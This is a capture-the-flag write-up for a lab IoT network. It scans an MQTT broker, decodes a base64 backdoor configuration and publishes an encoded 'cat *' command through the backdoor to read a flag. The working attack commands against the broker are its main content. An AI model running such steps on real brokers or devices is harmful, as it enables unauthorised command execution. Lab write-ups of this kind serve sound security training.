CTF VulnNet Internal

Note

John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?

namp

nmap -A -sV -p- 10.10.85.233 

Output:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-07 19:03 CET
Nmap scan report for 10.10.85.233
Host is up (0.034s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE                  VERSION
1883/tcp open  mosquitto version 2.0.14
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/messages/received: 59
|     patio/lights: {"id":9498615153902037727,"color":"RED","status":"OFF"}
|     $SYS/broker/version: mosquitto version 2.0.14
|     $SYS/broker/shared_subscriptions/count: 0
|     $SYS/broker/load/publish/dropped/15min: 0.00
|     $SYS/broker/load/sockets/1min: 3.22
|     $SYS/broker/bytes/sent: 3994
|     $SYS/broker/clients/inactive: 0
|     $SYS/broker/load/messages/sent/15min: 7.77
|     $SYS/broker/load/publish/sent/5min: 11.59
|     $SYS/broker/load/sockets/15min: 0.26
|     $SYS/broker/clients/connected: 2
|     $SYS/broker/load/bytes/received/5min: 540.82
|     $SYS/broker/load/messages/sent/5min: 22.75
|     $SYS/broker/clients/total: 2
|     $SYS/broker/load/publish/received/15min: 0.00
|     $SYS/broker/uptime: 33 seconds
|     $SYS/broker/subscriptions/count: 3
|     $SYS/broker/publish/bytes/received: 1981
|     $SYS/broker/messages/sent: 142
|     $SYS/broker/store/messages/bytes: 296
|     $SYS/broker/load/publish/dropped/1min: 0.00
|     $SYS/broker/clients/active: 2
|     $SYS/broker/load/messages/received/15min: 3.86
|     $SYS/broker/store/messages/count: 52
|     $SYS/broker/load/publish/sent/15min: 3.91
|     $SYS/broker/publish/messages/dropped: 0
|     $SYS/broker/clients/disconnected: 0
|     $SYS/broker/publish/bytes/sent: 675
|     $SYS/broker/publish/messages/received: 0
|     $SYS/broker/publish/messages/sent: 84
|     $SYS/broker/load/sockets/5min: 0.76
|     livingroom/speaker: {"id":4007409197343670969,"gain":45}
|     $SYS/broker/load/publish/sent/1min: 53.91
|     $SYS/broker/load/bytes/sent/15min: 189.97
|     $SYS/broker/load/publish/received/5min: 0.00
|     $SYS/broker/load/bytes/received/15min: 187.07
|     $SYS/broker/load/bytes/sent/5min: 561.92
|     $SYS/broker/load/publish/received/1min: 0.00
|     $SYS/broker/clients/maximum: 2
|     $SYS/broker/load/publish/dropped/5min: 0.00
|     $SYS/broker/bytes/received: 2859
|     $SYS/broker/load/messages/received/1min: 45.29
|     kitchen/toaster: {"id":14194221257404514717,"in_use":false,"temperature":153.88422,"toast_time":272}
|     yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config: eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
|     $SYS/broker/load/messages/sent/1min: 99.20
|     $SYS/broker/messages/stored: 52
|     $SYS/broker/load/messages/received/5min: 11.17
|     $SYS/broker/load/connections/5min: 0.58
|     $SYS/broker/load/connections/1min: 2.46
|     $SYS/broker/load/bytes/sent/1min: 2587.53
|     $SYS/broker/retained messages/count: 51
|     $SYS/broker/clients/expired: 0
|     $SYS/broker/load/bytes/received/1min: 2188.79
|     $SYS/broker/load/connections/15min: 0.20
|_    storage/10.10.85.233thermostat: {"id":2291235996486415869,"temperature":23.365356}

The port 1883 is open, the service is mosquito version 2.0.14.
We can also see mqtt-subscribe.

Documentation

https://cs.pomona.edu/classes/po181u/docs/labs/lab4/

I have to install mosquito:

sudo pacman -S mosquitto

1. mosquitto_pub : for publishing to MQTT servers
2. mosquitto_sub : for subscribing to MQTT servers

   -h : mqtt host to connnect to. Defaults to localhost
   -t : mqtt topic to publish/subscribe to
   -m : mqtt message body for publication
   -v : print published messages verbosely

   

Get base64 string

I’m looking for all the datas with mosquitto_sub.

mosquitto_sub -h 10.10.85.233 -t "#"

echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ== |base64 -d

Output:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}

The ID is : cdd1b1c0-1c40-4b0f-8e22-61b357548b7d
registered_commands: CMD should be usefull for us.
pub_topic:U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub
sub_topic:XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub

Now we can try to publish a command.we also need to let the subscriber listen.

Send a command

Subscriber

mosquitto_sub -h 10.10.85.233 -t "#" 

Publisher

mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eqrgijkosrgfuheqrguirgequi"

Decode it

echo SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk= |base64 -d

Output

Invalid message format.
Format: base64({"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"})%  

Use the backdoor

We need to encode it in base64.

echo '{"id": "4879005204976514238", "cmd": "CMD", "arg": "cat *"}' |base64

Output:

eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAq
In0K

This will be our message.

mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAqIn0K"

FLag

echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9 |base64 -d

Output:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag{18d44fc0707ac8dc8be45bb83db54013}\n"}